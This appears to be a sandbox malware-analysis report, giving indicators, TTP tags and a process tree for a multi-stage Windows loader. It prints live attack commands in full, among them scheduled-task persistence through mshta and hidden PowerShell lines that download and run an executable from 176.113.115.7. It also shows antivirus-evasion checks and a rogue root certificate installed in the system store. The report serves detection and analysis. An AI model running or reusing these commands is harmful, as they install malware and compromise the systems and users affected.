description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 9e426d06c1.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 9e426d06c1.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 9e426d06c1.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2464 schtasks.exe 3044 schtasks.exe 2104 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1720 11.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1376 powershell.exe 1376 powershell.exe 1376 powershell.exe 2660 TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE 2028 rapes.exe 1512 9e426d06c1.exe 1512 9e426d06c1.exe 1512 9e426d06c1.exe 1512 9e426d06c1.exe 1512 9e426d06c1.exe 2836 Exam.com 2836 Exam.com 2836 Exam.com 532 BIm18E9.exe 3068 powershell.exe 2836 Exam.com 2836 Exam.com 2836 Exam.com 2836 Exam.com 372 Exam.com 372 Exam.com 372 Exam.com 372 Exam.com 2076 powershell.exe 1760 powershell.exe 764 powershell.exe 3068 powershell.exe 3068 powershell.exe 2244 powershell.exe 1804 TempGCOQPIBVXC8IYUYJHM1WTYYOO0CRUAOV.EXE 1904 BIm18E9.exe 2244 powershell.exe 2244 powershell.exe 2660 483d2fa8a0d53818306efeb32d3.exe 348 Passwords.com 348 Passwords.com 348 Passwords.com 3056 Exam.com 3056 Exam.com 3056 Exam.com 348 Passwords.com 348 Passwords.com 348 Passwords.com 348 Passwords.com 2052 Exam.com 2052 Exam.com 2052 Exam.com 3056 Exam.com 3056 Exam.com 3056 Exam.com 3056 Exam.com 2140 BIm18E9.exe 2140 BIm18E9.exe 2140 BIm18E9.exe 2140 BIm18E9.exe 1644 5792319151.exe 1644 5792319151.exe 1644 5792319151.exe 1644 5792319151.exe 1644 5792319151.exe 2832 b6a245b7ee.exe 2052 Exam.com 2052 Exam.com 2052 Exam.com -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 480 Process not Found 480 Process not Found -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 1376 powershell.exe Token: SeDebugPrivilege 236 tasklist.exe Token: SeDebugPrivilege 3040 tasklist.exe Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 2076 powershell.exe Token: SeDebugPrivilege 1760 powershell.exe Token: SeDebugPrivilege 764 powershell.exe Token: SeDebugPrivilege 2244 powershell.exe Token: SeDebugPrivilege 1080 tasklist.exe Token: SeDebugPrivilege 988 tasklist.exe Token: SeDebugPrivilege 2640 tasklist.exe Token: SeDebugPrivilege 2624 tasklist.exe Token: SeDebugPrivilege 1596 tasklist.exe Token: SeDebugPrivilege 2316 tasklist.exe Token: SeDebugPrivilege 2768 taskkill.exe Token: SeDebugPrivilege 1996 taskkill.exe Token: SeDebugPrivilege 2436 taskkill.exe Token: SeDebugPrivilege 1568 taskkill.exe Token: SeDebugPrivilege 236 taskkill.exe Token: SeDebugPrivilege 2064 firefox.exe Token: SeDebugPrivilege 2064 firefox.exe Token: SeDebugPrivilege 1820 aba3392099.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 2284 f5b76ee2f82d8dcc2dd274f1db28f32d.exe 2284 f5b76ee2f82d8dcc2dd274f1db28f32d.exe 2284 f5b76ee2f82d8dcc2dd274f1db28f32d.exe 2660 TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE 2836 Exam.com 2836 Exam.com 2836 Exam.com 2588 c587569be1.exe 2588 c587569be1.exe 2588 c587569be1.exe 348 Passwords.com 348 Passwords.com 348 Passwords.com 3056 Exam.com 3056 Exam.com 3056 Exam.com 2052 Exam.com 2052 Exam.com 2052 Exam.com 3048 0596495a6d.exe 3048 0596495a6d.exe 3048 0596495a6d.exe 3048 0596495a6d.exe 3048 0596495a6d.exe 3048 0596495a6d.exe 3048 0596495a6d.exe 2064 firefox.exe 2064 firefox.exe 2064 firefox.exe 2064 firefox.exe 3048 0596495a6d.exe 3048 0596495a6d.exe 3048 0596495a6d.exe -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 2284 f5b76ee2f82d8dcc2dd274f1db28f32d.exe 2284 f5b76ee2f82d8dcc2dd274f1db28f32d.exe 2284 f5b76ee2f82d8dcc2dd274f1db28f32d.exe 2836 Exam.com 2836 Exam.com 2836 Exam.com 2588 c587569be1.exe 2588 c587569be1.exe 2588 c587569be1.exe 348 Passwords.com 348 Passwords.com 348 Passwords.com 3056 Exam.com 3056 Exam.com 3056 Exam.com 2052 Exam.com 2052 Exam.com 2052 Exam.com 3048 0596495a6d.exe 3048 0596495a6d.exe 3048 0596495a6d.exe 3048 0596495a6d.exe 3048 0596495a6d.exe 3048 0596495a6d.exe 3048 0596495a6d.exe 2064 firefox.exe 2064 firefox.exe 2064 firefox.exe 3048 0596495a6d.exe 3048 0596495a6d.exe 3048 0596495a6d.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2284 wrote to memory of 2364 2284 f5b76ee2f82d8dcc2dd274f1db28f32d.exe 30 PID 2284 wrote to memory of 2364 2284 f5b76ee2f82d8dcc2dd274f1db28f32d.exe 30 PID 2284 wrote to memory of 2364 2284 f5b76ee2f82d8dcc2dd274f1db28f32d.exe 30 PID 2284 wrote to memory of 2364 2284 f5b76ee2f82d8dcc2dd274f1db28f32d.exe 30 PID 2284 wrote to memory of 1820 2284 f5b76ee2f82d8dcc2dd274f1db28f32d.exe 31 PID 2284 wrote to memory of 1820 2284 f5b76ee2f82d8dcc2dd274f1db28f32d.exe 31 PID 2284 wrote to memory of 1820 2284 f5b76ee2f82d8dcc2dd274f1db28f32d.exe 31 PID 2284 wrote to memory of 1820 2284 f5b76ee2f82d8dcc2dd274f1db28f32d.exe 31 PID 2364 wrote to memory of 2464 2364 cmd.exe 33 PID 2364 wrote to memory of 2464 2364 cmd.exe 33 PID 2364 wrote to memory of 2464 2364 cmd.exe 33 PID 2364 wrote to memory of 2464 2364 cmd.exe 33 PID 1820 wrote to memory of 1376 1820 mshta.exe 34 PID 1820 wrote to memory of 1376 1820 mshta.exe 34 PID 1820 wrote to memory of 1376 1820 mshta.exe 34 PID 1820 wrote to memory of 1376 1820 mshta.exe 34 PID 1376 wrote to memory of 2660 1376 powershell.exe 37 PID 1376 wrote to memory of 2660 1376 powershell.exe 37 PID 1376 wrote to memory of 2660 1376 powershell.exe 37 PID 1376 wrote to memory of 2660 1376 powershell.exe 37 PID 2660 wrote to memory of 2028 2660 TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE 38 PID 2660 wrote to memory of 2028 2660 TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE 38 PID 2660 wrote to memory of 2028 2660 TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE 38 PID 2660 wrote to memory of 2028 2660 TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE 38 PID 2028 wrote to memory of 1512 2028 rapes.exe 40 PID 2028 wrote to memory of 1512 2028 rapes.exe 40 PID 2028 wrote to memory of 1512 2028 rapes.exe 40 PID 2028 wrote to memory of 1512 2028 rapes.exe 40 PID 2028 wrote to memory of 888 2028 rapes.exe 42 PID 2028 wrote to memory of 888 2028 rapes.exe 42 PID 2028 wrote to memory of 888 2028 rapes.exe 42 PID 2028 wrote to memory of 888 2028 rapes.exe 42 PID 888 wrote to memory of 2492 888 WLbfHbp.exe 43 PID 888 wrote to memory of 2492 888 WLbfHbp.exe 43 PID 888 wrote to memory of 2492 888 WLbfHbp.exe 43 PID 888 wrote to memory of 2492 888 WLbfHbp.exe 43 PID 2492 wrote to memory of 236 2492 CMD.exe 45 PID 2492 wrote to memory of 236 2492 CMD.exe 45 PID 2492 wrote to memory of 236 2492 CMD.exe 45 PID 2492 wrote to memory of 236 2492 CMD.exe 45 PID 2492 wrote to memory of 1388 2492 CMD.exe 46 PID 2492 wrote to memory of 1388 2492 CMD.exe 46 PID 2492 wrote to memory of 1388 2492 CMD.exe 46 PID 2492 wrote to memory of 1388 2492 CMD.exe 46 PID 2492 wrote to memory of 3040 2492 CMD.exe 47 PID 2492 wrote to memory of 3040 2492 CMD.exe 47 PID 2492 wrote to memory of 3040 2492 CMD.exe 47 PID 2492 wrote to memory of 3040 2492 CMD.exe 47 PID 2492 wrote to memory of 2480 2492 CMD.exe 48 PID 2492 wrote to memory of 2480 2492 CMD.exe 48 PID 2492 wrote to memory of 2480 2492 CMD.exe 48 PID 2492 wrote to memory of 2480 2492 CMD.exe 48 PID 2492 wrote to memory of 2064 2492 CMD.exe 49 PID 2492 wrote to memory of 2064 2492 CMD.exe 49 PID 2492 wrote to memory of 2064 2492 CMD.exe 49 PID 2492 wrote to memory of 2064 2492 CMD.exe 49 PID 2492 wrote to memory of 808 2492 CMD.exe 50 PID 2492 wrote to memory of 808 2492 CMD.exe 50 PID 2492 wrote to memory of 808 2492 CMD.exe 50 PID 2492 wrote to memory of 808 2492 CMD.exe 50 PID 2492 wrote to memory of 2400 2492 CMD.exe 51 PID 2492 wrote to memory of 2400 2492 CMD.exe 51 PID 2492 wrote to memory of 2400 2492 CMD.exe 51 PID 2492 wrote to memory of 2400 2492 CMD.exe 51 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1260
-
C:\Users\Admin\AppData\Local\Temp\f5b76ee2f82d8dcc2dd274f1db28f32d.exe"C:\Users\Admin\AppData\Local\Temp\f5b76ee2f82d8dcc2dd274f1db28f32d.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn enZacmaLhcM /tr "mshta C:\Users\Admin\AppData\Local\Temp\VzWCtgcdJ.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn enZacmaLhcM /tr "mshta C:\Users\Admin\AppData\Local\Temp\VzWCtgcdJ.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2464
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\VzWCtgcdJ.hta3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Users\Admin\AppData\Local\TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE"C:\Users\Admin\AppData\Local\TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\10340260101\9e426d06c1.exe"C:\Users\Admin\AppData\Local\Temp\10340260101\9e426d06c1.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1512
-
-
C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe"C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat8⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:236
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"9⤵PID:1388
-
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"9⤵
- System Location Discovery: System Language Discovery
PID:2480
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2679789⤵
- System Location Discovery: System Language Discovery
PID:2064
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Spanish.vss9⤵
- System Location Discovery: System Language Discovery
PID:808
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "East" Removed9⤵
- System Location Discovery: System Language Discovery
PID:2400
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com9⤵
- System Location Discovery: System Language Discovery
PID:1608
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j9⤵PID:1000
-
-
C:\Users\Admin\AppData\Local\Temp\267978\Exam.comExam.com j9⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2836
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 59⤵
- System Location Discovery: System Language Discovery
PID:2796
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:532
-
-
C:\Users\Admin\AppData\Local\Temp\10341150101\c587569be1.exe"C:\Users\Admin\AppData\Local\Temp\10341150101\c587569be1.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2588 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn ffSXgmad6W5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\kzER8lJ6n.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
PID:1756 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn ffSXgmad6W5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\kzER8lJ6n.hta" /sc minute /mo 25 /ru "Admin" /f9⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3044
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\kzER8lJ6n.hta8⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1200 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GCOQPIBVXC8IYUYJHM1WTYYOO0CRUAOV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3068 -
C:\Users\Admin\AppData\Local\TempGCOQPIBVXC8IYUYJHM1WTYYOO0CRUAOV.EXE"C:\Users\Admin\AppData\Local\TempGCOQPIBVXC8IYUYJHM1WTYYOO0CRUAOV.EXE"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1804
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10341160121\am_no.cmd" "7⤵
- System Location Discovery: System Language Discovery
PID:2120 -
C:\Windows\SysWOW64\timeout.exetimeout /t 28⤵
- Delays execution with timeout.exe
PID:2480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:2176 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:2240 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵PID:1696
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "R8NVzmaDAzS" /tr "mshta \"C:\Temp\TCyXqVw31.hta\"" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2104
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\TCyXqVw31.hta"8⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2660
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10341300101\BIm18E9.exe"C:\Users\Admin\AppData\Local\Temp\10341300101\BIm18E9.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1904
-
-
C:\Users\Admin\AppData\Local\Temp\10341310101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10341310101\7IIl2eE.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2020 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat8⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1236 -
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"9⤵
- System Location Discovery: System Language Discovery
PID:2352
-
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:988
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"9⤵
- System Location Discovery: System Language Discovery
PID:2224
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183779⤵
- System Location Discovery: System Language Discovery
PID:2772
-
-
